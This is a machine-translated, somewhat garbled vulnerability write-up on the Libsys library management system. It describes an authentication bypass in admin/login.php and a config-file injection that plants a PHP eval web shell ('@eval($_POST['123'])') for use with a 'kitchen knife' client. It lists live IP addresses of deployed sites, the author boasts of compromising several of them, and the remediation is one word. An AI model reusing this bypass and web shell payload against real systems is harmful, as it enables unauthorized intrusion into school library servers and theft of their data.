Full-version Permission Bypass + Getshell for the Libsys Library Management System

Full-version Permission Bypass + Getshell for the Libsys Library Management System

Due to a very low-level code error, you can log on to any Libsys library system background, and because the code is not filtered, you can directly getshell.

The library management system has a large number of users, which is used by a large number of schools nationwide. The vulnerability exists in versions 3.5-5.0 because of the risk of getshell and pants removal.

List of users on the official website:
 

I will analyze the latest version 5.0 in a simple way ,:

First, check the vulnerable files: admin/login. php.
 

Session_start (); if (isset ($ _ REQUEST ['username']) {$ strUser = trim ($ _ REQUEST ['username']); $ strInput = trim ($ _ REQUEST ['passwd']); $ strMsg = "incorrect user name or password"; switch ($ strUser) {case "opac_admin ": $ strPassWd = $ strPassWdFile; $ strMsg = verify_pwd ($ strInput, $ strPassWd); $ strUrl = "pai_basic.php"; break; case "view_admin": $ strPassWd = $ strPassWdView; $ strMsg = verify_pwd ($ strInput, $ strPassWd); $ strUrl = "cfg_review.php"; break; default: $ strMsg = "incorrect user name or password"; break ;} if ($ strMsg = false) {$ strMsg = "username or password error";} else {$ _ SESSION ['admin _ user'] = $ strUser; header ("Location :". $ strUrl );}}

Code analysis shows that there are two backend administrators, one for configuring website information and the other for viewing comments. And the two user names are all written to the Code. (If you do not use these two users to log on, it will be handed over to default for processing.) Pay attention to the processing of the default branch, here, $ strMsg is assigned a value, that is, if $ strMsg is not set to false, the session named ADMIN_USER will be generated after it is processed by the else branch, and assign the username value of the user name you just logged on.



Next let's take a look at the session code:
 

session_start( );if ( !isset( $_SESSION['ADMIN_USER'] ) ){header( "Location:login.php" );exit( );}

This simple sentence determines whether it is empty.

Next, we will go to the official website to find several websites for verification:

Http: // 202.195.136.14: 8080/

Http: // 210.33.16.16: 8080/

Background address: URL +/admin/login. php
 

Click log on and change the user name to another value:
 

After the modification is submitted, a user name or Password error will be prompted. It doesn't matter. Then we can directly access the configuration file:

Database Configuration: URL +/include/hwopacpwd. php
 

Website configuration: url +/include/hwopacpwd. php
 

Now we can modify the configuration of the library management system at will and try the official test site. The problem also exists.

Next, through code analysis, we found that codes were not filtered during configuration update,
 

Unction write_para ($ strFileName, $ strPara) {$ fhandle = fopen ($ strFileName, "wb"); if ($ fhandle) {$ strPara = "<? Php \ n ". $ strPara." \ n?> "; If (fwrite ($ fhandle, $ strPara) {fclose ($ fhandle); $ strMsg =" the data is modified successfully. ";} Else {$ strMsg =" data modification failed. ";}} Else {$ strMsg =" data modification failed. ";} Return $ strMsg ;}

In this way, we can insert any content in the configuration file. We can append a sentence to the configuration file;

When configuring the full-text index folder path, modify

c:/hwopac/index/

Is

c:/hwopac/index/";@eval($_POST['123']);//

Then open the updated configuration file:/include/hwopacpwd. php.
 

One sentence has been written successfully, and then the kitchen knife can be connected.
 

 

 

I tried a few of them and won them successfully. It's not a matter of minutes.


 

Solution:

Filter